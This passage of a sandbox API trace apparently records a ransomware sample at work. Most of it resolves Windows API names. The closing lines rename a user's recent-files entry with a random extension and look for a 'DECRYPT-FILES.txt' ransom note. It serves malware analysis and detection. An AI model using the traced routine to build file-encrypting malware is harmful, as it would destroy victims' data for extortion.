lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.058] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.058] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.058] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.058] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.059] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.059] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.059] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.059] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.059] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.059] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.059] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.059] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.059] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.059] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.059] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.059] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.059] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.059] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.059] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.059] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.059] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.059] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.059] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.060] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.060] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.060] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.060] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.060] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.060] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.060] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.060] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.060] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.060] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.060] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.060] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.060] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.060] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.060] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.060] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.060] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.060] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.061] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.061] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.061] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.061] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.061] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.061] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.061] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.061] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.061] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.061] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.061] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.061] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.061] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.061] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.061] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.061] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.061] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.061] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.062] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.062] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.062] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.062] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.062] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.062] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.062] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.062] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.062] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.062] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.062] lstrlenA (lpString="DELETEATOM") returned 10 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.062] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.062] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.062] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.062] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.062] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.062] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.062] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.062] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.063] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.063] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.063] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.063] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.063] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.063] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.063] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.063] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.063] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.063] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.063] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.063] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.063] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.063] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.063] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.063] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.063] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.063] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.063] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.064] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.064] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.064] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.064] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.064] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.064] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.064] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.064] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.064] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.064] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.064] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.064] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.064] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.064] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms") returned 134 [0080.065] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.qCIdwi7") returned 142 [0080.065] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.qCIdwi7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.qcidwi7"), dwFlags=0x0) returned 1 [0080.065] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.065] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.066] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.066] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe3b6c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabe3b6c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.066] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.066] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bce65c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x4bce4e50, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eb282ead62b4db87.automaticDestinations-ms", cAlternateFileName="EB282E~1.AUT")) returned 1 [0080.066] lstrcmpiW 